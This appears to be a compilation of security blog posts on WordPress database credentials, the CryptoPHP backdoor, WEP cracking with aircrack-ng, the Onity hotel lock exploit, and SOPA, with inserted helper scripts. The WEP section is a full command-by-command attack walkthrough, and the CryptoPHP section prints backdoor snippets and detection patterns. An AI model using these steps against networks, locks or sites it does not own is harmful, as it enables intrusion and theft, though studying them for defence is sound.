Find Your MySQL Username/Password in WordPress

If you need to manually manage your MySQL database associated with a WordPress installation, you’ll need to get the proper credentials first. Database connection information usually consists of:

  • Username (DB_USER)
  • Password (DB_PASSWORD)
  • Database name (DB_NAME)
  • Database host (DB_HOST)
  • Database port (WordPress assumes MySQL’s default port of 3306 unless DB_HOST carries one, e.g. db.example.com:3307)

This information lives in wp-config.php in the root of the WordPress installation. To show every line of wp-config.php that defines a DB_ constant, run the following command from the terminal (the define() lines are the output):

grep 'DB_' wp-config.php
define('DB_NAME', 'wordpress');
define('DB_USER', 'username');
define('DB_PASSWORD', '********');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');

This information can now be used to log in to MySQL’s command-line interface:

mysql -u username -p

Leaving the “-p” parameter empty makes the mysql client prompt you for the password. On a *NIX server it will look like you’re not typing anything; this is by design. You may specify the password on the same line, but it then ends up in your shell history and, for as long as the client runs, in the process list that any local user can read with ps. If you want to use this form anyway (i.e., in a script), note that there is no space between the “-p” flag and the password:

mysql -u username -ppassword

Once you’ve logged in, list the available databases with show databases;. To select your WordPress database, take the value of DB_NAME (above) and run use wordpress;. To list the tables in the selected database, run show tables;.
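To avoid the history and ps problem, the mysql client can read its credentials from an option file passed with --defaults-extra-file. The script below is an added example and not part of the original article: it parses the define() lines out of wp-config.php (including the host:port and host:/path/to/socket forms WordPress accepts in DB_HOST), writes a [client] option file that only the current user can read, and shows the connect command. The function names and the sample wp-config.php are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original article): read the DB_* constants out
# of wp-config.php and hand them to the mysql client through a private option
# file, so the password never sits on the command line, in shell history, or
# in `ps` output. Function names are ours; the wp-config.php format is the
# standard define('NAME', 'value') one.

# Print the value of define('NAME', 'value') from a wp-config.php file.
# Limitation: values that themselves contain quote characters are not handled.
# Usage: wp_define FILE NAME
wp_define() {
    sed -n "s/^[[:space:]]*define([[:space:]]*['\"]$2['\"][[:space:]]*,[[:space:]]*['\"]\\([^'\"]*\\)['\"].*/\\1/p" "$1" | head -n 1
}

# Split a WordPress DB_HOST into DB_HOST_NAME, DB_PORT and DB_SOCKET.
# WordPress accepts "host", "host:port" and "host:/path/to/socket".
# Usage: split_db_host DB_HOST_VALUE
split_db_host() {
    DB_HOST_NAME=$1 DB_PORT=3306 DB_SOCKET=
    case $1 in
        *:/*) DB_SOCKET=${1#*:};  DB_HOST_NAME=${1%%:*} ;;
        *:*)  DB_PORT=${1##*:};   DB_HOST_NAME=${1%%:*} ;;
    esac
}

# Write a [client] option file readable only by the current user.
# Usage: write_mysql_opts WPCONFIG OUTFILE
write_mysql_opts() {
    split_db_host "$(wp_define "$1" DB_HOST)"
    (
        umask 077      # the file is created 0600; nobody else can read the password
        {
            printf '[client]\n'
            printf 'user=%s\n'     "$(wp_define "$1" DB_USER)"
            printf 'password=%s\n' "$(wp_define "$1" DB_PASSWORD)"
            printf 'host=%s\n'     "$DB_HOST_NAME"
            if [ -n "$DB_SOCKET" ]; then
                printf 'socket=%s\n' "$DB_SOCKET"
            else
                printf 'port=%s\n' "$DB_PORT"
            fi
            printf 'database=%s\n' "$(wp_define "$1" DB_NAME)"
        } > "$2"
    )
}

# Constructed sample wp-config.php for the demonstration; not a real site.
sample=$(mktemp)
cat > "$sample" <<'EOF'
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wp_user');
define('DB_PASSWORD', 'S3cret-pass');
define('DB_HOST', 'db.internal:3307');
define('DB_CHARSET', 'utf8');
EOF

opts=$(mktemp)
write_mysql_opts "$sample" "$opts"
cat "$opts"
# Connect without the password ever touching argv, then remove the file:
#   mysql --defaults-extra-file="$opts"
#   rm -f "$opts"
```

The option file is read by the client before its command line is parsed, so `mysql --defaults-extra-file=FILE` behaves exactly like the interactive login above; delete the file when the maintenance is done.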

CryptoPHP – A WordPress backdoor in social.png

Summary

This is a series of posts on CryptoPHP, a PHP backdoor used for spamming and blackhat SEO. It seems to come bundled with certain copies of WordPress themes from unofficial sites and resides in a file named “social.png”. It comes installed with a list of email addresses and domains to contact and communicates with a C2 server using cURL and OpenSSL for encryption. Its main purpose appears to be to facilitate the display of links and other content, sent from the C2 server. When the script determines that a web crawler (e.g., GoogleBot), and not a real user, is viewing the site, it injects links to third-party sites in hopes of being indexed.

Symptoms

CryptoPHP communicates with external servers, requiring multiple external requests. You may see the following symptoms:

  • WordPress is slow to load, especially during the first pageview
  • Error messages in your server log, possibly due to failed requests.
  • Error messages from IDS/IPS or other security software (e.g., Suhosin) indicating that someone is making calls to exec and eval.

Discovery

A few days ago, I noticed that a WordPress installation was running extremely slowly. After enabling xhprof and profiling the index page, I noticed that a single method (RoQfzgyhgTpMgdUIktgNdYvKE) was taking around 160 seconds to run. The method name (others in the stack were similarly named) and the 23 calls to curl_exec came off as immediately suspicious. I used grep to search for the file and found it under the themes folder as images/social.png.

This file was included at the bottom of a theme file, causing it to be executed on each page load.

<?php include_once('images/social.png'); ?>

Opening social.png in a text editor reveals obfuscated and minified code. While it looks like a mess, it’s simply renamed variables and functions with whitespace removed, and can be undone rather easily with the “Find/Replace All” feature of your favorite text editor.

Obfuscated CryptoPHP

How to Remove CryptoPHP or social.png

In the limited tests that I’ve done, the offending file – social.png – is the only file that is malicious. It seems to be added to the images/ directory in themes downloaded from unofficial sources. Another line in the main theme files (index.php, header.php or footer.php) includes the file.
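Two quick checks for this pattern, as an added example that is not part of the original post: find files under a theme directory that are named like images but contain PHP, and find include/require statements whose target is not a .php file. The function names and the sample theme directory are constructed here; real PNG/JPEG/GIF files begin with a binary signature and have no business containing <?php.

```shell
#!/bin/sh
# Added example (not from the original post): two checks for PHP hidden in a
# theme's images/ directory and for theme files that include it. Function
# names are ours.

# Print paths of image-named files that contain PHP tags or common
# obfuscation calls.
# Usage: find_php_in_images THEME_DIR
find_php_in_images() {
    find "$1" -type f \( -iname '*.png' -o -iname '*.jpg' -o -iname '*.jpeg' -o -iname '*.gif' \) |
    while IFS= read -r f; do
        # -a treats binary data as text; -F matches the strings literally.
        if grep -a -q -F -e '<?php' -e 'eval(' -e 'base64_decode(' -- "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Print include/require lines in .php files whose quoted target does not end
# in .php (file:line:content).
# Usage: find_includes_of_non_php THEME_DIR
find_includes_of_non_php() {
    q="['\"]"
    find "$1" -type f -name '*.php' -exec \
        grep -H -n -E "(include|require)(_once)?[[:space:]]*\(?[[:space:]]*$q[^'\"]*$q" {} + |
    grep -v -E "\\.php$q"
}

# Constructed sample theme directory for the demonstration.
theme=$(mktemp -d)
mkdir -p "$theme/images"
printf '\211PNG\r\n\032\n' > "$theme/images/logo.png"      # genuine PNG signature
cat > "$theme/images/social.png" <<'EOF'
<?php eval(base64_decode('...')); ?>
EOF
cat > "$theme/index.php" <<'EOF'
<?php get_header(); ?>
<?php include_once("header.php"); ?>
EOF
cat > "$theme/footer.php" <<'EOF'
<?php wp_footer(); ?>
<?php include_once('images/social.png'); ?>
EOF

echo "== image files containing PHP =="
find_php_in_images "$theme"
echo "== includes of non-PHP files =="
find_includes_of_non_php "$theme"
```

Run both against wp-content/themes/ (and wp-content/plugins/, where the same trick works) and treat any hit as a file to pull apart rather than delete on the spot, so you keep the evidence of what it was talking to.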

While nothing in the file itself indicates that personal or sensitive data is being transmitted back to the server, the file allows its controllers to send commands to it. These commands are then executed by PHP’s eval and exec functions, so it is entirely possible for content, account information, etc. to be transmitted back to the controlling server.

Since the WordPress instance I was using was running on localhost, it would have been unreachable by the controlling servers. It could still phone home and download commands, but could not be controlled directly.  However, due to the possibility of sensitive data being stolen, and the evidence of storing information in the database, I’d recommend a complete re-install of WordPress and changing your admin password(s).

Coming Soon

  • Encryption methods (including a script to decrypt database contents)
  • Detailed/technical review

Cracking WEP Encryption With aircrack-ng

This article will walk you through cracking WEP encryption with the aircrack-ng suite. Due to the weaknesses in WEP, this can be done in roughly 5 minutes. For this attack, you’ll need the aircrack-ng suite, available from the aircrack-ng project site. You’ll also need a compatible wireless chipset that supports monitor mode and packet injection (see their documentation for details). I’ll be running this on Linux with an Atheros chipset.

The first step is to open up a Terminal, and enter iwconfig, this should give you a list of your wireless adapters. I’ll be using wlan0 in the examples, but yours may be different.

wlan0     IEEE 802.11bgn  ESSID:"FLVY3"  
          Mode:Managed  Frequency:2.412 GHz  Access Point: 00:26:62:65:B7:78   
          Bit Rate=54 Mb/s   Tx-Power=17 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:8DE0-85A9-34
          Power Management:on
          Link Quality=55/70  Signal level=-55 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:13   Missed beacon:0

Configure the Wireless Adapter

Now bring the interface down and change our MAC address (optional, uses the macchanger program) by issuing the following commands:

ifconfig wlan0 down
macchanger --mac AA:BB:CC:DD:EE:FF wlan0

If you get the “ERROR: Can’t change MAC: interface up or not permission: Device or resource busy” error, try repeating ifconfig wlan0 down, and then try macchanger --mac AA:BB:CC:DD:EE:FF wlan0 again. At any point, you can check your MAC address by issuing the command macchanger --show wlan0

Now we’ll put the wireless adapter into monitor mode by issuing the command airmon-ng start wlan0. It may list processes that it thinks may interfere with the aircrack-ng tools. You can kill these processes (newer releases offer airmon-ng check kill for this) or just give it a shot without killing them. Note that most versions create a separate monitor interface (mon0 on older releases, wlan0mon on newer ones) rather than switching wlan0 itself; use whatever interface name airmon-ng reports in all of the commands that follow. The examples below use wlan0 throughout.

Next, we’ll start the airodump-ng program by issuing the command airodump-ng wlan0 and scan for available access points. You should see something like this:

 CH  1 ][ Elapsed: 8 s ][ 2011-12-27 17:02

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:11:22:33:44:55  -62       82       10    0   1  54e. WEP  WEP         WiFi2

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 [station rows appear here]

The BSSID shows the MAC address for the access point and the ESSID should show the network name. CH indicates what 802.11 channel the AP is broadcasting on, and the ENC value is the encryption used (WEP, WPA, WPA2). The CIPHER and AUTH columns show what cipher and form of authentication are in place. The MB indicates what 802.11 version (speed) is in place. 802.11b has a value of “11”, 802.11b+ is represented by “22” and 802.11g is anything higher than 22. This AP also has an “e.” after it, which indicates that QoS is enabled (e) and that the short preamble is supported (.). Finally, the #Data column shows the number of packets captured – in the case of WEP, this is the number of unique IVs. The #/s column shows the average packets per second (calculated over a running 10-second interval).

We want to identify an AP that is using WEP encryption, not WPA or WPA2. Once we’ve figured out the BSSID and the channel, we’ll kill the program with Ctrl+C and restart it, filtering the results to that specific AP. We’re also going to capture the data to a file using the -w switch. Below, we use -c to specify the channel and --bssid to specify the BSSID of the AP. The filenamehere value can be anything you want.

airodump-ng -c 1 -w filenamehere --bssid 00:11:22:33:44:55 wlan0

You should now see the same screen as before, but with only the selected AP. The #Data column may or may not be incrementing, depending on whether or not a client is already active on the network and other factors. We want the #Data column to reach at least around 10,000 (longer 128-bit keys can need considerably more), and it would take forever to wait, so let’s speed that up.
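When airodump-ng runs with -w, it also writes filenamehere-01.csv next to the .cap. The helpers below are an added example and not part of the original article: they pull the WEP access points and their IV counts out of that CSV, and let a loop wait until a target has collected enough IVs before you run aircrack-ng. The column layout (BSSID, first/last seen, channel, speed, privacy, cipher, authentication, power, beacons, IVs, LAN IP, ID-length, ESSID, key; an AP section, a blank line, then a station section) is the one airodump-ng writes but is stated here as an assumption; the CSV content and function names are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original article): helpers around the CSV that
# airodump-ng writes beside the .cap when given -w. The column layout below is
# assumed to be airodump-ng's; function names are ours. ESSIDs that contain a
# comma are not handled.

# Print "BSSID CH IVs ESSID" for every WEP access point, most IVs first.
# Usage: wep_targets CSVFILE
wep_targets() {
    awk -F ', *' '
        /^BSSID, First time seen/ { in_ap = 1; next }   # AP section header
        /^Station MAC/            { in_ap = 0 }         # station section: stop
        in_ap && NF >= 14 && $6 ~ /WEP/ {
            printf "%s %s %s %s\n", $1, $4, $11, $14    # BSSID, channel, # IV, ESSID
        }
    ' "$1" | sort -k3,3nr
}

# Succeed once the given AP has collected at least MIN IVs (default 10000), so a
# loop can wait for the ARP replay to do its work before running aircrack-ng.
# Usage: enough_ivs CSVFILE BSSID [MIN]
enough_ivs() {
    n=$(awk -F ', *' -v b="$2" '$1 == b { print $11; exit }' "$1")
    [ "${n:-0}" -ge "${3:-10000}" ]
}

# Constructed airodump-ng CSV for the demonstration (not a real capture).
csv=$(mktemp)
cat > "$csv" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2011-12-27 17:02:00, 2011-12-27 17:02:08, 1, 54, WEP, WEP, , -62, 82, 10, 0. 0. 0. 0, 5, WiFi2, 
AA:BB:CC:00:11:22, 2011-12-27 17:02:00, 2011-12-27 17:02:08, 6, 54, WEP, WEP, , -70, 40, 1250, 0. 0. 0. 0, 5, Guest, 
66:77:88:99:AA:BB, 2011-12-27 17:02:01, 2011-12-27 17:02:08, 11, 54, WPA2, CCMP, PSK, -58, 91, 0, 0. 0. 0. 0, 8, HomeWiFi, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DE:AD:BE:EF:00:01, 2011-12-27 17:02:03, 2011-12-27 17:02:08, -40, 12, 00:11:22:33:44:55, WiFi2
EOF

echo "== WEP access points (BSSID CH IVs ESSID) =="
wep_targets "$csv"
if enough_ivs "$csv" AA:BB:CC:00:11:22 1000; then
    echo "AA:BB:CC:00:11:22 has enough IVs to try aircrack-ng"
fi
# In a live run:  until enough_ivs filenamehere-01.csv 00:11:22:33:44:55; do sleep 10; done
```

The same listing doubles as an audit tool: point it at a capture of your own site and any line it prints is an access point that should have been retired to WPA2 long ago.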

Faking Authentication & Capturing IV Packets

Open another terminal window. We’re going to fake an authentication to the AP, so that our packets register (and we can record the transactions). Issue the command:

aireplay-ng -1 0 -a (BSSID) -h (Your MAC) -e (ESSID) wlan0

In this example, I would enter:

aireplay-ng -1 0 -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF -e WiFi2 wlan0

Note: If you don’t know your MAC address, omit the -h and the MAC address. It should use the default address.

If successful, you’ll see an output like this:

17:08:35  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1

17:08:35  Sending Authentication Request (Open System) [ACK]
17:08:35  Authentication successful
17:08:35  Sending Association Request [ACK]
17:08:35  Association successful :-) (AID: 1)

We used the -1 switch to tell aireplay-ng to perform an authentication attack with a delay of 0. Sometimes this doesn’t work for a number of reasons, usually MAC address filtering is enabled (in which case you need to figure out the MAC of an approved computer, and spoof it), or you’re too close or too far away.

Now that we’ve authenticated, we’ll flood the AP with replayed ARP requests to drive up the #Data value in the first terminal window. Issue the following command:

aireplay-ng -3 -b 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF wlan0

If successful, you’ll see output like:

17:09:20  Waiting for beacon frame (BSSID: 00:11:22:33:44:55) on channel 1
Saving ARP requests in replay_arp-1227-171920.cap
You should also start airodump-ng to capture replies.
Read 1440 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

There should be a slight delay, followed by a stream of status text. Your terminal may show this as one line that continually updates or as line after line:

...
Read 38023 packets (got 19897 ARP requests and 10309 ACKs), sent 11410 packets..
Read 38174 packets (got 19993 ARP requests and 10358 ACKs), sent 11461 packets..
Read 38313 packets (got 20083 ARP requests and 10404 ACKs), sent 11510 packets..
Read 38455 packets (got 20171 ARP requests and 10451 ACKs), sent 11560 packets..
Read 38609 packets (got 20269 ARP requests and 10501 ACKs), sent 11610 packets..
Read 38748 packets (got 20357 ARP requests and 10546 ACKs), sent 11660 packets..
Read 38889 packets (got 20447 ARP requests and 10592 ACKs), sent 11711 packets..
Read 39033 packets (got 20535 ARP requests and 10640 ACKs), sent 11761 packets..
Read 39174 packets (got 20624 ARP requests and 10686 ACKs), sent 11810 packets..
Read 39326 packets (got 20719 ARP requests and 10735 ACKs), sent 11860 packets..
Read 39481 packets (got 20810 ARP requests and 10782 ACKs), sent 11911 packets..
Read 39635 packets (got 20909 ARP requests and 10832 ACKs), sent 11961 packets..
Read 39776 packets (got 20999 ARP requests and 10879 ACKs), sent 12011 packets..
Read 39919 packets (got 21090 ARP requests and 10926 ACKs), sent 12061 packets..
Read 40071 packets (got 21184 ARP requests and 10975 ACKs), sent 12111 packets..
Read 40212 packets (got 21271 ARP requests and 11020 ACKs), sent 12161 packets..
Read 40355 packets (got 21363 ARP requests and 11067 ACKs), sent 12211 packets..
...

Cracking the Key — Finally!

Once we’ve acquired enough #Data (these are the captured IVs), we can attempt to crack the key by using aircrack-ng. Open a third terminal, and issue the following command:

aircrack-ng -b 00:11:22:33:44:55 filenamehere-01.cap

Be sure to append “-01.cap” to the filenamehere value you picked (above). The -b value should be the BSSID of the access point.

The aircrack-ng program will read the captured IVs from the filenamehere-01.cap file, and you may see it scan through several screens (below) while it is testing the keys against the known IVs:

Opening filenamehere-01.cap
Reading packets, please wait...

                        Aircrack-ng 1.1 r1904


             [00:00:01] Tested 362881 keys (got 13078 IVs)

   KB    depth   byte(vote)
    0    1/  5   56(17408) 84(16896) DF(16896) F5(16896) 2D(16640)
    1    0/  2   B8(18688) A6(17664) AC(17408) 96(17152) F7(17152)
    2    1/  2   5A(18176) AC(17664) 32(16896) C8(16896) CF(16896)
    3    0/  1   67(19712) 03(18176) 81(17920) 53(17408) 9B(17408)
    4    2/  3   61(18176) 3B(17408) 4A(17408) 70(17408) 5F(17152)
    5    7/  8   B4(16640) 17(16384) B8(16384) CE(16384) EA(16384)
    6    2/  3   A5(17920) BE(17408) AD(17152) 36(16896) 2C(16640)
    7    0/  1   01(19968) F7(17408) 17(17152) 43(17152) C8(17152)
    8    2/  3   80(17664) 68(17152) 0F(16896) 5D(16896) E7(16896)
    9    2/  3   D3(17664) 72(16896) 1E(16640) AF(16640) D2(16640)
   10    6/  7   1C(16896) 39(16640) 6D(16640) 08(16384) 3D(16384)
   11    1/  2   42(18176) 12(17920) 3F(17664) 95(17152) FE(16896)
   12    3/  4   18(17408) F9(16896) D5(16640) E5(16640) 11(16384)

If you were successful, you should finally see a screen that looks like this:

            Aircrack-ng 1.1 r1904



             [00:00:15] Tested 535861 keys (got 13078 IVs)

   KB    depth   byte(vote)
    0   52/ 54   CA(14592) 2F(14336) 34(14336) 78(14336) 83(14336)
    1   10/  1   BB(16128) 1F(15872) 7C(15872) 8C(15872) 19(15616)
    2   12/ 26   67(16384) 15(16128) 6F(16128) AA(16128) 5E(15872)
    3    4/ 12   9B(17408) CF(16896) D5(16896) 16(16384) 1A(16384)
    4   16/  4   FF(16128) 77(15872) D5(15872) DD(15872) 27(15616)

                     KEY FOUND! [ XX:YY:ZZ:AA:BB ] 
Decrypted correctly: 100%

That’s it! In a matter of 15 seconds, aircrack-ng recovered the WEP key for the access point from the captured IVs. Moral of the story: if you don’t want people getting into your network, use WPA (or better yet, WPA2) with a strong passphrase, and never WEP.

Cleaning Up

Before you connect to the internet again, you’ll need to issue airmon-ng stop on the monitor interface (wlan0 here, or mon0/wlan0mon if airmon-ng created one for you) to release your adapter. Also, if you’re connecting via the command line, you can enter the key as hex digits (without the colons) normally, or, if it’s an ASCII passphrase, prefix it with s: (e.g. iwconfig wlan0 key s:passphrase). Bear in mind that aircrack-ng gives you the key in hex. If the network was set up using a WEP passphrase, the hex key may not look like anything you recognize, but entering it in hex mode will still work.

Onity Hotel Lock Exploit

Update: 12/28/2012 – I’m a bit late on this, but this has actually been exploited for criminal activity. Imagine that. Apparently, it’s not as “unreliable, complex and difficult to implement” as Onity thought.

Update: 8/19/2012 – Anxiously awaiting delivery of ATtiny85 chips to convert this into an even more compact device (also would be cheaper and able to be mass-produced).

Cody Brocious did a presentation at Black Hat 2012 on how to exploit the Onity hotel locks, and his write-up is the main source of information for this page. Please take the time to visit Cody’s site if you’re interested in how this works. I’m only going to present a brief overview, so as not to detract from his paper.

Unfortunately, I don’t have my own personal hotel locks to play with, and hotels thus far have either not had a GM available when I stopped in or the GM has dismissed this as nonsense. One even said “If I feel there’s a problem with our locks, I’ll contact our Onity rep. We pay them good money, so I’m sure this is all taken care of.” An engineer at Holiday Inn was very interested in resolving it, but I’m not aware of anyone making progress in getting the PP codes. (If you have a PP, there are plenty of us interested in engineering a software solution, rather than forcing a hardware update.)

A quick survey shows about 60-75% of the hotel locks in  Pittsburgh (city, not region) are vulnerable to this at the time of this writing.

The Lock

Lock

If you’ve stayed in a hotel, you’ve probably seen this lock. Cody asserts this lock is one of the more popular brands and gives a figure of over 4 million installed. What you probably haven’t seen is the programming port, located on the bottom of the lock (red arrow). It uses a size “K” DC adapter (5.0mm OD x 2.1mm ID, center positive) to communicate with the programming device (Portable Programmer, PP). I’ll refer you to Cody’s site for specifics on the communication protocol. Essentially, the PP and lock work as master-slave, with the PP as the master. The PP transmits a 3.3v signal (HIGH) when idle, and the signal drops into a LOW state in order to communicate.

When the locks are installed, a sitecode is written to the lock’s memory. This is a 32-bit value that’s unique to the facility, but shared among all equipment in that hotel. After that, there are several other values, including the code for the Master keys and the Programming key (more on this later).

Using the PP, staff are able to open the lock manually. The PP issues an “OPEN” command in combination with the sitecode. Since the sitecode is hidden from even the property owner, this is supposed to provide a bit of security against anyone just opening the lock, right?

(Of course not, you wouldn’t be reading this if that were the case!)

All we have to do is read the sitecode from the lock’s memory, and mix it in with the OPEN command (which is the same for every lock). This takes around 220 milliseconds to perform.

Open Command

The lock simply opens, and the access log reads as though the PP was used by staff to open the door. This is done by programming the Arduino to continuously send “open” commands via the DC plug. In practice, it takes around 1-2 seconds to open the lock, due to timing problems and at what point in the code you insert the plug into the lock. For all intents and purposes, it’s instantaneous.

The Arduino

If you haven’t heard of the Arduino yet, it’s similar to the BASIC Stamp microcontroller, but faster, cheaper and open-source. It is programmed in its own dialect, which is essentially C/C++ with a small library on top. An Arduino Uno runs around $35 at RadioShack and the Arduino Mega is around $65. Additional parts you’ll need (if starting from scratch) are:

  • A USB A-to-B cable (the big square plug is probably the one plugged into your printer)
  • Two “K” size DC barrel plugs (5.0mm OD x 2.1mm ID). Center is positive for both.
  • A few pieces of wire and a 5.6k resistor (green-blue-red for those people)
  • A 9v battery plug. Wire this to one of the DC plugs. This will be the power source for your Arduino. (You can run it off of USB power, but it won’t be as stealthy if you have a computer attached to it)
  • The Arduino software (Free – arduino.cc)
  • The source code – not provided here. (It’s not hard to find, but I’m not giving handouts)
Arduino

I also used some heat-shrink tubing and a lighter (hence the black smoke marks on the clear tubing), as well as two small pieces of 22ga solid wire. Everything is twisted together (not soldered) and held together with heat-shrink tubing.

I modified the code to blink the LED on pin 13 five times (50ms on/off) at the beginning of each loop, because I like feedback. I’m also working on code that will intercept the transmissions between the lock and a PP and send it back to my computer, on the off chance one of the managers calls me back and says “Yeah, sure, take a look”.

It’s not pretty, but it gets the job done (power supply not shown). Add a cool project enclosure, and you have yourself a portable master key to any room in any hotel that uses Onity locks.

Protect Yourself

Onity has acknowledged the problem (+1 point to Onity), but claims “the hacking methods [are] unreliable, and complex to implement.” If by “complex”, they mean “anyone with a few pieces of wire and a BIC lighter can throw this together in the middle of Starbucks in 10 minutes”, then yes, it’s very complex. Cody claims varying success with this device, but I don’t know that I’d call it “unreliable”. (In my limited tests, it has worked 100% of the time.)

Onity is currently manufacturing plugs (see above link) to block the programming port and also providing a Torx screw to replace the battery cover. That will stop anyone without a Torx bit (less than a dollar, if I recall correctly) from using this method. They totally won’t spend that extra dollar at RadioShack.

They’re also talking about a “firmware” update, by which they apparently mean “replace the circuit board in all 4 million locks and issue new programming devices to each hotel”. It’ll probably only be a matter of time until this new “firmware” is broken, too.

Case-in-point: Don’t let them fool you, this is inexpensive, shockingly easy to implement, and more reliable than it should be.

I don’t want to sound like I’m suggesting a boycott of anyone using Onity locks, but if you’re concerned about your safety, you may want to choose a hotel with a different lock (given the option). A brief look at Pittsburgh hotels (city, not suburban) shows that around half of them have Onity locks.

It goes without saying that you should be using the chain lock /bar latch on the door (but this can be kicked in easily or opened with a rubber band). Hopefully, you’d wake up if this was going on, but I’ve slept through much more.

While the old adage “locks are meant to keep honest people out” still holds true, this particular lock requires almost zero skill to open. If you can install iTunes, transfer music to your iPod, then plug it into your car sound system, you can do this.

Stop Online Piracy Act (SOPA) and You

Note: This was written quite a while ago. While the risks are still factual, the politics are well outdated.

This article touches briefly on the security risks associated with the Stop Online Piracy Act (SOPA).

What is SOPA?

H.R. 3261, also known as the Stop Online Piracy Act (SOPA), is a piece of legislation that attempts to allow federal censorship of the internet (along with S.968, commonly referred to as the PROTECT IP Act). Both of these bills not only threaten our freedom online, but could also have a major effect on internet censorship globally. Politics aside, the act poses several very real security threats, not only to the infrastructure of the internet itself but to the millions of people who use it every day. A whitepaper on the subject presents an in-depth analysis of the technical problems that would be caused by implementing DNS-level censorship. I’m not going to discuss the infrastructure risks or politics here, but rather focus on the security risks that will very likely present themselves to the average internet user.

Proposed Implementation: DNS Filtering

There are several ways to censor content on the web. With the current Digital Millennium Copyright Act, or DMCA, individual service providers are responsible for removing infringing content. In other words, if I were to post copyrighted content, my hosting provider would be responsible for removing my site, not the government. An ISP can be served with a DMCA takedown notice by anyone who feels their copyright has been infringed, and sites may be taken down with only a “good faith effort” on behalf of the complaintant – it doesn’t even have to be a legitimate takedown notice, it just needs to be filed with good intentions. For the special interests groups (MPAA, RIAA, et al.), this still isn’t enough.

In countries like China, Iran, and Egypt, the national governments handle the censorship. The method that’s been proposed for the US (and is used in some countries) is DNS filtering. Your employer, school, or other organization may employ DNS filtering on a local level, which isn’t so bad for the health of the internet. (It’s also easy to bypass.)

However, implementing DNS filtering on a nationwide level poses a number of security threats to the internet itself, which in turn create security threats to you, the end user. DNS (Domain Name System) is the system by which your computer translates a web address (http://www.cmattoon.com) to an IP address (69.175.118.186). Computers only understand IP addresses, but they’re inconvenient for humans to remember, so we have a “phonebook” (so to speak), that translates an easy-to-remember domain name to an IP address, so that your computer can connect to the correct server. When you type an address into your web browser, the DNS looks up the IP address, and gives it back to your computer. Then, your computer can connect to the site you requested.

DNS Filtering works by giving your computer bad directions. If you wanted to view www.example.com, which contained information that your government felt was unsuitable for you, the DNS would give your computer the IP address of the government’s “Nothing to see here” page. By tampering with the directory system of the internet and re-directing content, you open up the system to exploitation. We’ve worked so hard to improve security and trust online, and tampering with the DNS undermines both of those.

Fact: The Filters WILL Be Bypassed

“Locks are there to keep honest people out” – this saying touches upon the reality that no lock (or filter) will keep determined people from attaining their goal. Teenagers bypass parental controls to look at porn. Employees bypass corporate web filters to get to their favorite sites. The Chinese have been bypassing the “Great Firewall of China” since its inception. No matter what the government tries to throw at people, they’ll eventually find a way to circumvent it. Several tools have already been created for the sole purpose of bypassing anticipated SOPA filters.

Besides using browser add-ons or third-party applications, users can modify their HOSTS file, or change their default DNS servers (say, to a foreign DNS that’s not subject to US law). You can even enter the IP address directly into the URL field, and bypass the DNS altogether (since your computer doesn’t need to look up directions). Aside from manually entering an IP address or installing an approved Firefox add-on, these steps can pose a serious risk to your computer if performed improperly.

Any new technology or change in habit among internet users as a whole opens up new possibilities to malicious hackers, identity thieves, etc. Let’s take a look at the can of worms that SOPA could open.

Problem #1: Malicious Software & Websites

Once the general public is fully aware of the SOPA provisions, perhaps when YouTube is taken down due to SOPA violations, they will begin to look for alternatives. Opportunists will likely develop a million different versions of software that will allow you to view or download the blocked content. While some of these programs may be legitimate, we all know how many virus-ridden, spyware-infested applications are available for download over the internet. Since most people these days have antivirus software installed, this shouldn’t be too much of an issue, right?

Wrong.

Even legitimate software could be used to modify your HOSTS file (perhaps automatically, for ease of use), to help you get to your favorite censored website. Currently, Windows protects the HOSTS file against changes unless accessed with Administrator privileges. Of course, that doesn’t necessarily stop malicious hackers from gaining access, either directly or through an application. And while your antivirus may catch an attempt to modify the HOSTS file, it will be widely publicized that modification of the HOSTS file, albeit risky, is not so bad after all. Therefore, more users will probably just click “ignore”, or simply disable their antivirus when it won’t let them ignore the file. (If you think this isn’t the case, there are hundreds of studies that show people will open just about anything, ignoring all warnings, to get to what they want.)

The second problem with software solutions is that they come with the possibility of intercepting ALL of your internet traffic. For example, a new program that routes traffic around the DNS filters has to know what site you’re requesting, as well as have the means to shuttle information back and forth. A malicious programmer could easily write a program to capture all your login data, and send it off to his computer. Again, this already happens on a daily basis (google: phishing, or see Credential Harvesting with SET).

Software aside, thousands of blogs and websites will appear (and have already started to), telling users how to bypass the DNS filter. The problem is, not all of these websites will be truthful. Be wary of any site telling you to “download this widget” or “allow Administrator access” to a program. Always double-check the information you find online with reputable sources. Don’t simply follow the first tutorial that Google shows you.

Problem #2: Rogue DNS Servers

Additionally, there is the option to modify your DNS settings, so that your computer queries a DNS server in another country that doesn’t have to comply with SOPA. Let me re-state that for clarity:
You would be trusting someone’s server, located in the basement of some guy’s house on the other side of the world and outside the jurisdiction of US law, to tell your computer where every website lives.

While it’s true that a lot of DNS servers will probably pop up, and many will be operated by well-intentioned free-speech advocates, companies trying to make a few bucks, or whomever, there WILL be a large number operated by malicious people. A resolver you trust sees every domain you look up and can answer with any address it likes, sending you to an impostor copy of your bank or webmail instead of the real site. (Of course, there’s always the possibility that the “good” DNS servers will be hacked and abused the same way.)

